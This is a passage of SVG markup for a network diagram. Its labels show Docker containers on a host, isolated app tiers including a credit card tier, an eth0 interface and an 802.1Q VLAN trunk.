transform="matrix(1,0,0,1,252,201.98406475670117)"><g transform="translate(0,0)"><g transform="translate(4,-98.9329528808594) translate(-256,-103.05111187584177) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 257 332.5 L 257 206.98406475670117" stroke-miterlimit="10" stroke-width="3"/></g></g></g></g><g transform="translate(0,0) matrix(0.9970841003774397,-0.07631052859541608,0.07631052859541608,0.9970841003774397,6.812265994936054,40.19841100496578)"><g><g transform="translate(0,0) scale(5.40007959672885,3.87815826436388) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#999999" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,15,322)"><g><g transform="translate(0,0) scale(5.31,2.59)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.18832391713747648,0.3861003861003861)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 521 0 Q 531 0 531 10 L 531 249 Q 531 259 521 259 L 10 259 Q 0 259 0 249 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 521 0 Q 531 0 531 10 L 531 249 Q 531 259 521 259 L 10 259 Q 0 259 0 249 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,47,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.004201680672269)"><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#5fcc5a" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,115,387)"><g transform="translate(0,0)"><g transform="translate(38,-78.9329528808594) translate(-153,-308.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 119 409 L 119 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,-3,543)"><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="566" height="32" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="566" height="32" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="25" y="0" width="83" height="16" fill-opacity="0"/></g></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="25" y="0" width="83" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="25" y="14">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="76" y="14">Host</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="108" y="0" width="360" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="108" y="14">:</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="115" y="14">Frontend</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="171" y="14">,</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="179" y="14">Backend</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="234" y="14"> &amp;</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="251" y="14">Credit</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="292" y="14">Card</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="326" y="14">App</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="355" y="14">Tiers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="390" y="14">are</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="414" y="0" width="53" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="bold" text-decoration="" line-height="16.5px" x="414" y="14">Isolated</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="467" y="0" width="515" height="32" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="471" y="14">but</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="494" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="521" y="14">still</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="27" y="30">communicate</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="114" y="30">inside</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="201" y="30">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="258" y="30">or</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="275" y="30">any</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="301" y="30">other</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="337" y="30">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="385" y="30">hosts</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="423" y="30">using</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="460" y="30">the</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="154" y="16" width="44" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="154" y="30">parent</text></g><g transform="translate(1676,32) matrix(1,0,0,1,0,0) translate(-1676,-32)"><g><rect fill="rgb(0,0,0)" stroke="none" x="483" y="16" width="57" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="483" y="30">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="525" y="30">ID</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,31,290)"><g transform="translate(4,4) scale(1.0010060362173039,1.00625)"><g><g transform="translate(0,0) scale(4.97,0.8)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.2012072434607646,1.25)"><path fill="#000000" stroke="none" d="M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(4.97,0.8)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.2012072434607646,1.25)"><path fill="#cccccc" stroke="none" d="M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 487 0 Q 497 0 497 10 L 497 70 Q 497 80 487 80 L 10 80 Q 0 80 0 70 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,300,248)"><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="258" height="48" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="258" height="32" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="101" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="3" y="14">802</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="27" y="14">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="31" y="14">1Q</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="53" y="14">Trunk</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="91" y="14"> -</text></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="104" y="0" width="242" height="32" fill-opacity="0"/></g></g><g transform="translate(211,0) matrix(1,0,0,1,0,0) translate(-211,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="104" y="0" width="242" height="32" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="104" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="130" y="14">be</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="150" y="14">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="161" y="14">single</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="202" y="14">Ethernet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">link</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="39" y="30">or</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="55" y="30">Multiple</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="107" y="30">Bonded</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="159" y="30">Ethernet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="216" y="30">links</text></g></g><g transform="matrix(1,0,0,1,200,307)"><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="157" height="22" fill-opacity="0"/></g></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="157" height="22" fill-opacity="0"/></g></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="125" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="normal" text-decoration="" line-height="22.75px" x="63" y="19">Interface</text></g><g transform="translate(32,0) matrix(1,0,0,1,0,0) translate(-32,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="42" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="16" y="19">eth0</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,207,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#fca13f" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,207,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.004201680672269)"><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.19)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8403361344537815)"><path fill="#fca13f" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 109 Q 144 119 134 119 L 10 119 Q 0 119 0 109 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,234.91044776119404,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,225.955223880597,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,217,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,227,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" 